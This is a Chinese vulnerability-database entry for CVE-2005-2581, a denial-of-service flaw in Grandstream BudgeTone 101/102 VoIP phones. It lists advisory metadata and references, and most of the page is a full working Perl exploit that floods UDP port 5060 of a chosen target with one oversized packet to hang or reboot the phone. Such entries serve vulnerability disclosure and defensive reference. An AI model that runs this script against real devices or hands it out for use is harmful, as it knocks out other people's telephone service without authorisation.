Grandstream Budge Tone 拒绝服务漏洞

Grandstream Budge Tone 拒绝服务漏洞

漏洞ID 1108991 漏洞类型 其他
发布时间 2005-08-12 更新时间 2005-10-20
图片[1]-Grandstream Budge Tone 拒绝服务漏洞-安全小百科CVE编号 CVE-2005-2581
图片[2]-Grandstream Budge Tone 拒绝服务漏洞-安全小百科CNNVD-ID CNNVD-200508-150
漏洞平台 Hardware CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/1153
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200508-150
|漏洞详情
GrandstreamBudgeTone101和102运行固件1.0.6.7及可能早期版本允许远程攻击者借助于对5060端口的大的UDP包造成拒绝服务(设备挂起或重启)。
|漏洞EXP
#!/usr/bin/perl
#
use IO::Socket;
use Term::ANSIColor;

############################ U S A G E ###################################
system ("clear");
print "nGrandstream BT101/BT102 DoSn";
print "written by pierre kroma ([email protected])nn";

if (!$ARGV[2]){
print qq~
Usage: perl grandstream-DoS.pl -s <ip-addr> <udp-port> {-r/-s}

	<ip-addr>  = ;-)
	<udp-port> = 5060

	-r = 'reboot' 	the Grandstream BT 101/102
	-s = 'shutdown' the Grandstream BT 101/102

~; exit;}
################################## D E F I N I T I O N S####################

$victim = $ARGV[0];
$port = $ARGV[1];
$option = $ARGV[2];

if ( $option == 'r' || $option == 'R' )
{	$request= 'k'x65534;}

if ( $option == 's' || $option == 'S' )
{	$request= 'p'x65535;}
else
{	print "Wrong parameter - try it again";
	exit;
}


# ping the remote device
print color 'bold blue';
print "nping the remote device $victimn";
print color 'reset';
system("ping -c 3 $victim");

print color 'bold red';
print "n Wait ... nnn";
print color 'reset';
$sox = IO::Socket::INET->new(Proto=>"udp",PeerPort=>"$port",PeerAddr=>"$victim");

print $sox $request;
sleep 1;
close $sox;

# ping the remote device
print color 'bold blue';
print "ping the remote device $victim againn";
print color 'reset';
system("ping -c 3 $victim");

# milw0rm.com [2005-08-12]
|参考资料

来源:SECTRACK
名称:1014665
链接:http://securitytracker.com/id?1014665
来源:BID
名称:14539
链接:http://www.securityfocus.com/bid/14539
来源:SECUNIA
名称:16438
链接:http://secunia.com/advisories/16438
来源:BUGTRAQ
名称:20050812GrandstreamBudgeTone101/102DoSVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112388062328906&w;=2

相关推荐: Microsoft Windows 9x明文凭据缓存漏洞

Microsoft Windows 9x明文凭据缓存漏洞 漏洞ID 1206835 漏洞类型 信任管理 发布时间 1999-11-29 更新时间 2005-05-02 CVE编号 CVE-1999-0387 CNNVD-ID CNNVD-199911-076 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享